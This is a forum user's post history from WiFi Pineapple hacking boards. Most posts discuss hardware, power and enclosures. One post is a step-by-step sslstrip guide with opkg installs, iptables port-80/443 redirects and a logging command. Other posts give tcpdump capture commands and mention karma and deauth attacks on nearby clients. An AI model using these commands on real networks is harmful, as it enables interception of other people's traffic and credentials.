telot
-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
Yes it is absolutely possible. There are pros and cons to some various techniques, but we'll start with your questions, then get to the guts of the issue.
- Does it go into monitor mode (not simply promiscuous mode)?
Yes you can do this
- Does it support capturing to some form of mass storage (USB drive would be fine)?
Yep!
- If monitor mode is supported, is it supported on the internal Wi-Fi chip, or only on a USB Wi-Fi adapter?
Internal or external or both! (more on that in a minute)
- Does the Pineapple support the ALFA AWUS036H, or only the AWUS036NHA in the HakShop?
Newest firmware supports both!
- Is a USB battery pack sufficient to power the Pineapple, USB Wi-Fi card (e.g. an ALFA) and USB storage drive combined?
Depends on the battery pack :)
Now - you can hook up a usb stick to your pineapple, follow the instructions on these forums to setup some of it to be a swap partition for the fruit, and the rest mass storage. Then run airmon-ng stop mon.wlan0 and airmon-ng start wlan0. You can then install tcpdump and run tcpdump -i mon0 -w /usb/cap.pcap -n net 172.16.42.0/24 & - you'll then be saving every packet that on the channel that mon0 is set to. The major downside to this method is you can no longer karma anyone, as you've removed the pineapples ability to sniff out probe requests.
Your other option is to not have a usb stick, and instead have your AWUS036x card plugged in. Now you can airmon-ng start the new wlan and capture all the packets and still karma all the kids to your pineapple (its also great way to do deauths, including airdropping!). The downside to this of course is you have no place to store all the caps. Now, you can either get an independently powered usb hub and try it that way (I've never attempted this - I think its gotten mixed results) OR find some way of piping the capture files to a server. I tried to setup sshfs and failed miserably, but we've gotten samba working this week and that is my brightest hope for the moment. Unfortunately I haven't the time this weekend to test it out, but if you're up for it, do eet!
Hope this helps
telot
-
This looks awesome wiregr! I've been trying to get sshfs working on the pineapple to no avail, but this is the next best thing! I want to use the alfa awus036nha that I got from the hakshop, which makes it impossible to use the usb drive for storage of my tcpdumps. I'll try and play around with using samba for storage of the caps instead of sshfs! Thanks!
telot
-
A few of us over on the netstumbler forums did this with linksys wrt-54g's. One of the moderators put a few in taxi cabs and let them wardrive for him. I think his brother ran the company or something. Someone else, I think it was Mother, modded his with a 3g radio, this was before every phone had internet access, or at least mostly cheap internet access. I might have to pull my serial gps out of my 54g and add it to my pineapple....
That sounds like an awesome project barry! Do eet up!
telot
-
I could use this for my fleet vehicles. B)
Seconded!
telot
-
Pineapple fleet management...I like this! For a wide scale deployment (multiple units) - you could easily see on a google-maps like interface where your pineapple is, and maybe do a hover-over or clickable icon to see its last communication? That way you can monitor its uptime and so-on! Not a bad idea billius!
telot
-
Short answer, it'll be awesome dude. Long answer is long...
Let me preface this with a big fat WARNING!!!!! The following advice only pertains to those who have two SEPARATE batteries or usb ports or whatever. Doing the following on one computer with multiple usb ports will be VERY BAD for your computer.
With that out of the way, to more fully answer your question, it depends on how you wire the Y cable.
If its in series (taking the + and putting it to the - of each usb port) then you will double the voltage (from 5V to 10V) which will (via ohms law) thereby reducing the amount of amps you're pulling. In lay terms, that means your batteries will last twice as long (booya!).
Wiring the the Y cable in parallel, you will have double the capacity (amp/hours) but the same voltage...5V.
See this diagram for a visual explanation: http://www.zbattery.com/core/media/media.nl?id=7097&c=288557&h=dfa0e19a839ae9849759
Either way, its full of awesome as long as, once again - you're doing this with TWO SEPARATE POWER SOURCES. Have fun!
Also, has anyone actually had fried pineapples? I wonder if its good...
telot
-
So no negotiation. Just have to know it's 12V and give it 12V.
Or as low as 5V. But anyways, theres no need to buy a POE box - just DIY! Heres a link for a great POE cable...or perhaps the GREATEST poe cable.
telot.org/poe.html
telot
-
Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.
TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :)
telot
-
$284 gives you quite a lot of bang for your buck! That price is quite impressive really. Not that the mark4 is underpowered by any means, but like you said, if you could get this thing in a populated enough area, hundreds of clients could be handled without problems I'm guessing...intriguing!
Has anyone here had more than 50 clients simultaneously connected to the mark4? I'd be interested in knowing what the upper limit is
telot
-
Hi Telot
Why would this be necessary? This is ssl traffic and can't be decrypted:
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
Also I am having a problem with direction
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router.
Unfortunately I don't know enough about IP tables to fix this problem.
Any help would be appreciated.
Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?
I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.
telot
-
Have you looked at the Macbook Air? You mentioned that portability is a primary concern of yours, and with the latest refresh with ivy bridge, they're certainly plenty powerful. I myself have a i7 8gb of ram on order at the moment :) Just a thought
telot
-
Ok - theres never been a straight up "How to get sslstrip working" thread - theres quite a few bits and pieces and theres always WM's module...but people still seem to be confused. I am to put a stop to this via this here guide.
1. Install sslstrip:
opkg update
opkg install --dest usb sslstrip
Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this: opkg install sslstrip (herpaderp)
2. One time configuration of sslstrip:
A HUGE thanks to Vulture for laying this out for us:
ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7
touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py
3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
4. run sslstrip!
sslstrip -w /usb/sslstrip.log &
Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet! Hope you all enjoy
telot
-
Just what the doctor (and 2.3.1!) ordered! Thanks for the update WM!
telot
-
Many true hackers have tried to do their part in showing the difference between hackers and criminals by doing things like writing papers and making videos. Unfortunately your average john doe wont likely be interested in just randomly finding out what a hacker is for himself. In the end, many of these papers only preach to the choir. If you wanted to quickly end the criminal stereotype you would have to mass broadcast a message that would reach Mr and Mrs Doe. Hollywood prefers to make the hacker the criminal in the story and it is very unlikely they will make a movie where a hacker is the hero. Maybe they could sell it as a MacGyver spin off. The quickest way would be to take over and broadcast a message on all networks possible which would be a ... crime. The only other way I can think of that could end the stereotype is a change in the education systems.
tl;dr: It is a nice paper, but the people who need to, likely wont read it.
I think theres a lot of Hollywood media with hackers as the good guys...
http://www.imdb.com/title/tt0113243/
http://en.wikipedia.org/wiki/Breaking_In_(TV_series)
http://www.imdb.com/title/tt0105435/
telot
-
digip, you're my favorite dick on the internet.
Mostly because you're usually correct about what you say.
telot
-
Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)?
Kidding aside, this looks like a great addition to the pineapple - I thinking bringing more and more metasploit into the fold only bolsters the pineapples e-rep - a lot of folks in the community now a days looks on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not looking over. Thanks Darren!
telot
-
I have not tried it, but there has been rumblings about alfa cards wanting more juice than the pineapple can give which causes the card to just stop after a bit. People have thwarted this by supplying 12V to the pineapple (as opposed to 5V from powering via USB) and/or bringing down the tx power of the alfa card with iwconfig wlan1 T 10 or something. I believe that was referring to the 036NHA, not the old 036H, so you might have better luck...either way report back your results so we can all learn!
telot
-
I'm going to build something around this. There's enough room for a power supply battery too.
I picked it up at Walmart for under $9. Its actually a hypodermic case for people with diabetes.
Bleh! Demonic Wilford is NOT something you want to wake up to...
I like the case - how much of that is metal vs shiny plastic? I imagine for 9 bucks its mostly plastic - but if theres lots of metal you may get some interference.
telot
-
Yes, please see the multitude of other posts asking for this exact same thing :)
Search the Jasager forums for tcpdump - you'll find my guide for using it via command line, and whistle master's module for gui sniffing.
telot
-
OK, nevermind, but the main site (www.wifipineapple.com) redirects to github. It's quite confusing.
Yes...we seem to have a number of pineapple related websites all competing to be "the one"...
telot
-
Yep I have extensively. The old Mark3 would definitely overheat (see my/others fan-mod posts if you have a mark3) even without an enclosure if you were...lets say "intensively" using it. The mark4 seems to be cool as a cucumber, though I guess I'm not sure what 3G solution you're using (if any) - that could add some heat. In general though, if you have a mark4 - heat is no problem.
telot
-
Pour beer in a glass and give it to me.
I've never played with Windows 8, but from what little I know, they haven't changed the networking too much. Though it may be accessed from a different spot, you should still be able to get into your ethernet adapter (Local Area Connection) and assign a static IP, same as always. I can't imagine they'd leave that out of the developer preview. Once you get into your adapters settings, the instructions should be the same (ip: 172.16.42.42, subnet 255.255.255.0 - turn on ICS, etc)
Let us know how it goes! There is no tutorial/how-to yet, so it'd be great if you could write one up!
telot
-
=== UPDATE ===
I spoke to soon at 18 dBm it disassociated after about 30min. I tried 16 and it immediately disconnected with the DHCP request. I am now at 14 dBm. I will see how this goes.
Please keep us updated regarding this. The topic is near and dear to my heart and I'm very curious how it pans out, as the same thing is happening with my raspberry pi (too much draw). I'll add any data I gather as well. Thanks digitaladdictions!
telot
-
Very interesting idea - hide the fact your rocking a pineapple by obfuscating the /www directory...I guess I've never thought I'd ever run into anyone who knows what a pineapple is, let alone how to exploit it. But as the hacker con season is coming up, perhaps this would be a good addition to the new "stealth mode" pineapple features.
telot
Poor Wifi Signal Range
in WiFi Pineapple Mark IV
Posted
Well its good news you isolated the problem and found a remedy - well done ptrac3! We should def keep this in mind for the once every month or two question about this :)
telot